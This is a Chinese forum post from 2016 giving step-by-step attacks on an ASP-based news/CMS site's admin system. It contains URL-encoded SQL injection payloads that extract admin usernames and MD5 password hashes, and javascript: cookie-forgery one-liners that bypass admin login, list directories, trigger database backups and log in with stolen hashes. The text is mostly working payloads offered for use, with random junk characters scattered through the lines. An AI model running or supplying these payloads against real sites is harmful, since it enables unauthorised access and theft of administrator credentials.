一、注入
& k( O. k; P$ z# `, R1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
& }! G! [. k/ b& T; X- X \& Q1 u* G* D
* I, a: `5 z# m' p* ^/ d, C2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
" q7 p! |) u$ B1 ], d3 x" T第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin6 S! Z8 ~ M# V' Z
可得到用户名和MD5加密码的密码。
* Q" w6 z `" z' |9 M) H! ^2 s4 ] i6 P
二、cookies欺骗
% j0 x. D$ F7 j* W: T# b! w6 Z0 y3 j9 ^
1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞. : X/ A; w9 m& e. ^% V
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
) {% _4 Q Q- N: Q, K$ q
+ _& K2 i: y5 E# o; D1 w3 ^2、列目录. + P, n# x& ?" [+ o. i2 Z: Q5 j
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."
6 K" H/ ?5 b" }+ v5 F( A$ n* r9 @+ L* L% H6 j
3、数据库备份(适用性好像比较低.)
t) ] p3 R- D7 y" M$ `javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"
. b! ]" J) J8 Q3 r; U( V- \% @+ P1 T9 i/ ]- A
4、得到MD5密码解不了密进后台方法* R: g' C" A. u: [. }
javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"7 F& B# t+ d# J
|
发表于 2016-5-11 14:55:08
收藏
支持
反对